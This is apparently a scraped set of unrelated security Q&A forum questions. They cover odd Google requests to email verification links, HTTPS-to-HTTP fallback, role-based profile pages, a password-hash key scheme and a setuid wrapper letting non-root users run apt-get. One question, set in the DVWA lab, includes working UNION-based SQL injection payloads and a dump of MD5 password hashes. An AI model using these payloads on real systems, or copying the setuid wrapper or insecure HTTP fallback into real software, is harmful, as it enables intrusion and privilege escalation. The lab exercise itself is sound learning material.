Suspicious behavior by Google when verifying users via nodejs

I’m building a user authentication system in Node.js and use a confirmation email to verify that a new account is real.

The user creates an account and is prompted to check their email for a URL they click to verify the account.

It works great, no issues.

What’s unusual is that in testing, when I email myself (to simulate the new-user process) and click the verify URL, two further connections to the endpoint follow immediately. Upon inspection, the source IPs appear to belong to Google. What’s even more interesting is that the user-agent strings are random versions of Chrome.

Here’s an example of the last sequence. The first entry is the HTTP 200 request and the next two, the HTTP 400s, are Google. (Upon verification I remove the user’s verification code from the database, so subsequent requests return HTTP 400.)

- - [03/Jul/2020:20:35:40 +0000] "GET /v1/user/verify/95a546cf7ad448a18e7512ced322d96f HTTP/1.1" 200 70 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "" "" "US" "en-US,en;q=0.9"
- - [03/Jul/2020:20:35:43 +0000] "GET /v1/user/verify/95a546cf7ad448a18e7512ced322d96f HTTP/1.1" 400 28 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "" "" "US" "en-US,en;q=0.9"
- - [03/Jul/2020:20:35:43 +0000] "GET /v1/user/verify/95a546cf7ad448a18e7512ced322d96f HTTP/1.1" 400 28 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36" "" "" "US" "en-US,en;q=0.9"
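For context, the one-shot behaviour described above (consume the code on first use, HTTP 400 for every later hit) works roughly like this sketch; `verify` and `pendingCodes` are my own names, not the actual code:

```javascript
// Hypothetical sketch of the one-shot verification logic described above.
// Stand-in for the database table of pending verification codes.
const pendingCodes = new Map([['95a546cf7ad448a18e7512ced322d96f', 42]]);

// First call with a valid code succeeds (200) and consumes it;
// every later call with the same code fails (400), matching the log above.
function verify(code) {
  if (!pendingCodes.has(code)) return { status: 400 };
  const userId = pendingCodes.get(code);
  pendingCodes.delete(code); // one-shot: remove the code on first use
  return { status: 200, userId };
}

console.log(verify('95a546cf7ad448a18e7512ced322d96f').status); // 200
console.log(verify('95a546cf7ad448a18e7512ced322d96f').status); // 400
```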

Now, I’m using Cloudflare, so the first IP address in each line is a Cloudflare IP, and the second is the real client IP [as reported by Cloudflare]; I modified my "combined" log format in Nginx to capture it.
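The log format change was along these lines (a sketch only; the exact extra fields are my assumption, based on the trailing quoted fields in the log above and Cloudflare's CF-Connecting-IP / CF-IPCountry request headers):

```nginx
# Sketch of an extended "combined" log format; the added fields are a guess.
log_format combined_cf '$remote_addr - $remote_user [$time_local] '
                       '"$request" $status $body_bytes_sent '
                       '"$http_referer" "$http_user_agent" '
                       '"$http_cf_connecting_ip" "$http_true_client_ip" '
                       '"$http_cf_ipcountry" "$http_accept_language"';
```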

Anyhow, any idea what this is? Or why Google would be doing this?

It’s just incredibly suspicious given the use of randomized user agent strings.

And one last note: if I open Chrome DevTools and watch the Network tab before I click a verification link from my email, the two subsequent connections never come. It’s like Google knows I’m monitoring. This is just so incredibly odd that I had to ask the community. I’m thinking maybe this is an extension infected with some kind of tracking, but then how do the IPs come back as Google?

Best guidance for allowing users to connect via HTTP in case of a certificate error

I’ve coded my app to use HTTPS, but if an HTTPS transaction fails for any reason, I assume the server isn’t configured for HTTPS and thereafter start all transactions with HTTP. That seems like a vulnerability: for example, a script kiddie using a proxy to intercept the traffic on his own client hardware would be able to make all HTTPS transactions fail.

I’m told that if someone tries to MITM your app’s HTTPS request, the request should fail (invalid certificate) and your app should fail with an error, not fall back to HTTP. In a world where SSL is reliably available, sure, but maintaining valid SSL certificates is a task in itself. For example, Let’s Encrypt recently revoked some of its certificates and forced their renewal because of a security problem. Aside from revocations, certificates are short-lived and have to be renewed, and the renewal process involves a lot of stitchware and can fail. If SSL goes down, I don’t want my site to go dark.

What is the best guidance for either:

  1. More reliably maintaining certificates (such that if they do fail, the resulting downtime falls within the "five nines" SLA unavailability window) without it being such a manual headache, or

  2. Allowing the site to continue to work if SSL has failed? Is it easy to allow most activity to proceed over HTTP, but require HTTPS for known-critical transactions?

Note that no browsers are involved in the scenarios that concern me.

How to create user profile pages and display them based on user roles

Example: I have a website with 3 different user roles (amongst others):

  • developers
  • designers
  • contributors

I would like to have profile pages for users, and to be able to display users on pages filtered by their role. I hope this is clear. I have researched quite a few membership plugins and found that they are bloated with features; I ended up with TMI and no answers or solutions, so if you can help I would appreciate it. Do you know of any plugins capable of doing this?

Thanx in advance

Using the hash of the user’s password for encrypting/decrypting an E2E encryption/decryption key: is this good practice? [migrated]

I am developing a zero-knowledge app, meaning the data is encrypted in the client before it’s transmitted (over SSL) and decrypted after the data is received. If the database is ever compromised, without the user’s decryption keys the attacker knows nothing.

Of course, when the app is hosted on a web server, an attacker could still inject malicious scripts, but that’s always a risk. The idea is that the user data is encrypted by default. As long as no malicious code was added to the client code, the server should not be able to obtain the user data.

The title summarises how I intended to do this, but actually it’s a bit more convoluted:

  • On account registration, a secure random string is generated as (AES) encryption key (could also be private/public key generation here I guess). Let’s call this key K1.
    • All data will be encrypted/decrypted (e.g. using AES) with this key.
  • The plain text password is hashed to create another key. Let’s call this K2 = hash(plain password) (for example using SHA256)
    • K2 is used to encrypt K1 for secure storage of the key in the remote database in the user profile.
    • If the user changes their password, all that needs to be done is re-encrypting K1 with K2 = hash(new password), so not all the data has to be decrypted and re-encrypted.
    • K2 is stored in localStorage as long as the user is authenticated: this is used to decrypt K1 at bootstrap.
  • K2 is hashed again to generate the password that is sent to the API: P = hash(K2) (also using SHA256 for example)
    • This is to prevent that the decryption key K2 (and therefore, K1) can be deduced from the password that the API/database receives.
  • In the API, the password P that is received is hashed again before it is compared/stored in the database (this time with a stronger function such as bcrypt).

My question is: does this mechanism make sense or are there any gaping security holes that I missed?

The only downsides that I see are inherent to zero-knowledge, E2E encrypted apps:

  • Forgotten password = all data is lost (cannot be decrypted). This is why the user is recommended to write down the encryption key K1 after creating the account: then the data can always be recovered.
  • Searching, indexing, manipulating, analysing the data is limited because everything has to be done client-side.

DVWA SQLi: How to get column names from table “users” only? [closed]

This is DVWA database. There are only 2 tables in it.

mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.00 sec)

mysql>

I’ve no issue getting these 2 tables via the SQL injection bug:

' UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=DATABASE() -- -&Submit=Submit#

Output in web (TABLE_NAME in “dvwa” DATABASE)

First name: guestbook,users 

Table “users” looks interesting, and I would like to know all the columns in it.

There are 6 columns as shown in MySQL query below.

mysql> SELECT * FROM users;
+---------+------------+-----------+---------+----------------------------------+--------+
| user_id | first_name | last_name | user    | password                         | avatar |
+---------+------------+-----------+---------+----------------------------------+--------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 |        |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 |        |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b |        |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 |        |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 |        |
+---------+------------+-----------+---------+----------------------------------+--------+
5 rows in set (0.00 sec)

mysql>

However, my next attempt, to get only the columns from table users, didn’t work well:

' UNION SELECT GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_schema=DATABASE() -- -&Submit=Submit#

Output in web

First name: comment_id,comment,name,user_id,first_name,last_name,user,password,avatar 

The problem is columns comment_id,comment,name are not part of users table.

What’s wrong with this SQLi syntax, and how do I get the column names from table users only? The output I’m after is:

First name: user_id,first_name,last_name,user,password,avatar 

What are the potential vulnerabilities of allowing non-root users to run apt-get?

There are two ways I can think of doing this:

  1. On a system with sudo, by modifying /etc/sudoers.

  2. On a system without sudo (such as a Docker environment), by writing a program similar to the one below and setting the setuid bit with chmod u+s. apt-get checks the real uid, so a setuid call is necessary.

...
int main(int argc, char **argv) {
    char *envp[] = { ... };
    setuid(0);
    execve("/usr/bin/apt-get", argv, envp);
    return 1;
}
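For option 1, the /etc/sudoers route would be a one-line entry along these lines (the group name is hypothetical; edit with visudo):

```
# Hypothetical entry: members of group "pkgadmins" may run apt-get as root
# without a password.
%pkgadmins ALL=(root) NOPASSWD: /usr/bin/apt-get
```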

I have two questions:

  1. What are the potential vulnerabilities of allowing non-root users to run apt-get?
  2. My goal is to allow people to install/remove/update packages, given that apt-get lives in a custom non-system refroot and installs from a custom curated apt repository. Are there safer ways to allow non-root users to run apt-get on a system without sudo?